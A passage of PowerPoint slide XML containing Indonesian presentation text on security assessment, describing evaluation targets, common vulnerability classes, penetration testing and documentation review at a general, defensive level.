              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI. Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>targetnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Analis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aspek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relevan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teridentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkisar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemaparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tujuan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relevan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Peninjauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Dokumentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meninjau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, diagram </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip-prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
